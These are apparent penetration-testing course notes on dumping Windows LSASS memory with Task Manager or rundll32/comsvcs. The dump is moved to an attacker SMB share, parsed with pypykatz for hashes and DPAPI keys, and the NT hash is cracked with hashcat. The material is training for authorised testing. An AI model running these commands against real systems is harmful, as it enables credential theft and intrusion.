Attacking LSASS

LSASS (Local Security Authority Subsystem Service) is a critical Windows service responsible for:

Caching credentials in memory
Creating access tokens
Enforcing security policies
Writing security logs

Accessing LSASS process memory can expose sensitive authentication data such as hashes and plaintext credentials.

Dumping LSASS Process Memory

To extract credentials, we first create a memory dump of the LSASS process. This allows offline analysis, minimizing time spent on the target system and avoiding detection.

✅ Method 1: Task Manager

Steps:

Open Task Manager
Go to the Processes tab
Locate Local Security Authority Process (lsass.exe)
Right-click → Create dump file

Dump Location:

C:\Users\loggedonusersdirectory\AppData\Local\Temp\lsass.DMP

📤 Transfer the dump to your attack machine using a file transfer method from the Attacking SAM section.

✅ Method 2: Rundll32.exe & Comsvcs.dll

Useful in CLI-only environments and faster than GUI.

🔍 Step 1: Find LSASS PID

CMD:

tasklist /svc

PowerShell:

Get-Process lsass

Example Output:

lsass.exe                      672 KeyIso, SamSs, VaultSvc

💾 Step 2: Dump LSASS

PowerShell (Admin):

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

❗ Modern antivirus solutions may block this method. AV bypassing is outside this module’s scope.

Moving the File to the attacker

On attack Box

Start the SMB Server

python3 impacket-smbserver share . -smb2support

On Target Machine

Move files from the Windows machine to your SMB share:

move lsass.dmp \\10.10.15.16\CompData

Using Pypykatz to Extract Credentials

Pypykatz is a Python-based implementation of Mimikatz and can parse LSASS dumps offline on Linux.

Run Command:

pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Pypykatz Output Breakdown

🔐 MSV (MSV1_0)

Used to authenticate against the SAM database.

Username: bob
Domain: DESKTOP-33E7O54
NT Hash: 64f12cddaa88057e06a81b54e73b949b
SHA1 Hash: cba4e545b7ec918129725154b29f055e4cd5aea8

🔐 WDIGEST

An older authentication protocol. If enabled, may contain cleartext passwords.

username: bob
password: None

🔒 WDIGEST is disabled by default on modern Windows versions.
🛡️ Microsoft Security Update: View details

🏷️ Kerberos

Used in Active Directory environments. LSASS may store:

Tickets
Credentials
Encryption keys (ekeys)

Username: bob
Domain: DESKTOP-33E7O54

🔑 DPAPI (Data Protection API)

Used to encrypt/decrypt sensitive data across apps:

Application

Usage

Internet Explorer

Saved form data

Google Chrome

Saved passwords

Outlook

Email account passwords

Remote Desktop

Saved session credentials

Credential Manager

Wi-Fi, VPN, and network credentials

key_guid: 3e1d1091-b792-45df-ab8e-c66af044d69b
masterkey: e8bc2f...f195fba92

🔐 This masterkey can decrypt data protected by DPAPI.

Cracking the NT Hash with Hashcat

We can now crack the NT hash extracted via Pypykatz.

Command:

sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

Result:

64f12cddaa88057e06a81b54e73b949b:Password1

✅ Password successfully cracked – attack completed.

PreviousAttacking SAM (Security Account Manager)NextAttacking Active Directory & NTDS.dit

Last updated 9 months ago

hashtagDumping LSASS Process Memory

hashtag✅ Method 1: Task Manager

hashtag✅ Method 2: Rundll32.exe & Comsvcs.dll

hashtagMoving the File to the attacker

hashtagUsing Pypykatz to Extract Credentials

hashtagPypykatz Output Breakdown

hashtag🔐 MSV (MSV1_0)

hashtag🔐 WDIGEST

hashtag🏷️ Kerberos

hashtag🔑 DPAPI (Data Protection API)

hashtagCracking the NT Hash with Hashcat